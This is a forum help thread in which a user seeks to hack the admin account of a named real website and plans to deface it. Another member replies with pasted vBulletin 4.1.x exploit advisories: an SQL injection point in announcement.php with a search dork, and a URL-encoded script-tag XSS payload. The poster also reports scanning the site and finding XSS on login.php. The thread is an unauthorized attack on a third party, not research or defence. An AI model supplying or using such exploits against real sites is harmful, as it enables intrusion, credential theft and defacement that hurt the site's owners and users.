[Help] Vulnerable site?

    #1

    [Help] Vulnerable site?

    Well, hello everyone, first of all!
    I managed to find the admin page of this site: aionarena.com.br
    the admin page is: Only registered and activated users can see links. Click here to register...
    but when it comes to getting the admin password I can't manage it. I would like to know what its vulnerability is; I have already tried to exploit it but couldn't..
    Thanks!
    #2
    the forum version is vBulletin 4.1.9; there are exploits that allow access..
    "Respect your efforts, respect yourself. Self-respect leads to self-discipline.
    When you have both firmly under your belt, that's real power."

      #3
      Ok.. I'll do some research here...
      But if it's not too much trouble, could you send me the code for this exploit?

        #4
        Code:
        ########################################################
        #
        # Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
        #
        # Author        : IrIsT.Ir
        #
        # Discovered By : Am!r
        #
        # Home          : http://IrIsT.Ir
        #
        # Software Link : http://vbulletin.com
        #
        # Security Risk : High
        #
        # Version       : All Version
        #
        # Tested on     : GNU/Linux Ubuntu - Windows Server - win7
        #
        # Dork          : "Powered By Vbulletin"
        #
        ########################################################
        #
        #  Expl0iTs :
        #
        #  [TarGeT]/announcement.php?a=&announcementid=[Sql]
        #
        #########################################################
        #
        # Greats : Zarbat.Org - Aria-Security.Com - datacoders.org - black-hg.org
        # 
        #     Security7.ir - AjaxTm.Com - Sepehr-Team.Org And All Iranian Hackers
        #
        #########################################################
        Code:
        # Exploit Title: vBulletin 4.1.7 => 4.1.10 XSS Vulnerability 
        # Google Dork: intitle: powered by vBulletin 4.1.10
        # Date: 20/02/2012
        # Author: .e0f
        # Software Link: [http://www.vbulletin.com/]
        # Version: [4.1.10 Others not tested]
        # Tested on: [BackTrack 5 | BlackBuntu | Windows 7/xp]
        # Contact: [https://twitter.com/#!/e0fx]
        # Home: [http://brutezone.ru]
        # Greetz: Inj3ct0r Exploit DataBase 1337day.com
        # Video: [http://vimeo.com/39049790]
        ######################################################################################################
        Vulnerability:
        1.
        Send New Private Message > 
                                 > 
           Message text > %22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (encode script UTF-8)
        ######################################################################################################
        
        Watch the video: [http://vimeo.com/39049790]
        
        ##########################################################################################
                               4ll 1nformati0n is pr0vid3d f0r ref3rence 0nly!
        ##########################################################################################
        Greetz to: Babka | F1xeR | ga1Do4ok | Dark-x | Moderor | 2FED | 4elovek 
          v1nest | .e0f | ka0z | silver | Saint | x0r | Duman | ugly | Shadow008 | AlphaSky
           * special thanks to: fpteam-cheats.com | brutezone.ru | From Russia with Love....
        ###########################################################################################
        
        
        # 1337day.com [2012-03-24]
        "Respect your efforts, respect yourself. Self-respect leads to self-discipline.
        When you have both firmly under your belt, that's real power."

          #5
          what programming language is the exploit in?..
          Sorry, I'm very noob

            #6
            Well, I ran the analysis here with Acunetix, and the site is vulnerable to XSS
            /login.php ...
            login.php is vulnerable, but how can I exploit the flaw?
            this will be my first deface t.t

              #7
              the exploit is not written in any programming language; these show places where it may be possible to perform SQL injection and XSS
              "Respect your efforts, respect yourself. Self-respect leads to self-discipline.
              When you have both firmly under your belt, that's real power."

                #8
                Wow. I'm going to have to study, and a lot; I couldn't do anything with this exploit .. wow!

                  #9
                  Originally posted by Pwunkz
                  the forum version is vBulletin 4.1.9; there are exploits that allow access..
                  and it's not the forum I want, it's the site's admin..
                  I don't want anything from the forum kk '
